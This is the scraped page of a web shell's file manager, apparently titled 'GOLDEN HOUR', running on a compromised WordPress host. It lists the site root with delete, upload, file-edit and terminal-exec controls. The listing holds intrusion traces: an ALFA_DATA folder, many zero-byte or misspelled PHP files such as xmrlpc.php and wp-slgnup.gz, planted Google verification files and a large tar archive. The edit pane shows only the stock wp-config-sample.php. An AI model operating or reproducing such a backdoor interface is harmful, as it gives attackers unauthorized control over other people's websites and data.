GOLDEN HOUR
DIR: /home/vlabbdco/public_html
UP
UPLOAD
Name
Size
Action
.htaccess.bak-20260622
523 B
DEL
.htaccess.bk
461 B
DEL
.litespeed_flag
297 B
DEL
[ .tmb ]
-
DEL
[ .well-known ]
-
DEL
.well-known.tar
794.43 MB
DEL
[ .wp-cli ]
-
DEL
422
0 B
DEL
[ ALFA_DATA ]
-
DEL
Cap.php
0 B
DEL
[ LV ]
-
DEL
Savv.php
0 B
DEL
about.php
0 B
DEL
admin.php
0 B
DEL
api.php
0 B
DEL
aztec-kurulum.php
2.12 KB
DEL
[ cgi-bin ]
-
DEL
clear.php
0 B
DEL
content.php
0 B
DEL
[ deac10 ]
-
DEL
defaults.php
0 B
DEL
detail.php
0 B
DEL
domvf.php
1.22 MB
DEL
error_log
869.71 MB
DEL
filefuns.php
0 B
DEL
flap.php
6.93 KB
DEL
fpwch.php
0 B
DEL
goods.php
0 B
DEL
google1588975857979d77.html
53 B
DEL
google3aa33d73ab6fb797.html
53 B
DEL
google679d110b6a88e62d.html
53 B
DEL
google83cb97e9e9aad3d6.html
53 B
DEL
google9aff444a1cf021e8.html
53 B
DEL
googlefb1f327f5209f1ff.html
53 B
DEL
kilitle.php
0 B
DEL
networks.php
0 B
DEL
new-index.php
0 B
DEL
php.ini
695 B
DEL
product.php
0 B
DEL
products.php
0 B
DEL
qxmesyhqif.php
0 B
DEL
readme.html
7.11 KB
DEL
robots.txt
340 B
DEL
sample.php
648 B
DEL
shop.php
0 B
DEL
[ spbackupB ]
-
DEL
[ wp ]
-
DEL
wp-activate.php
6.93 KB
DEL
wp-add.php
3.27 KB
DEL
[ wp-admin ]
-
DEL
wp-comments-post.php
2.27 KB
DEL
wp-config-sample.php
2.84 KB
DEL
wp-config.php
3.05 KB
DEL
[ wp-content ]
-
DEL
wp-coo.php
0 B
DEL
wp-cron.php
3.85 KB
DEL
wp-events.php
0 B
DEL
[ wp-includes ]
-
DEL
wp-links-opml.php
2.44 KB
DEL
wp-load.php
3.22 KB
DEL
wp-mail.php
8.26 KB
DEL
wp-phpinfo.php
19 B
DEL
wp-settings.php
20.48 KB
DEL
wp-signup.php
30.6 KB
DEL
wp-slgnup.gz
3.49 KB
DEL
wp-sx-generator.php
0 B
DEL
wp-trackback.php
4.7 KB
DEL
xmlrpc.php
3.16 KB
DEL
xmlrpcs.php
0 B
DEL
xmrlpc.php
0 B
DEL
Edit: wp-config-sample.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'database_name_here' ); /** MySQL database username */ define( 'DB_USER', 'username_here' ); /** MySQL database password */ define( 'DB_PASSWORD', 'password_here' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
SAVE FILE
TERMINAL
EXEC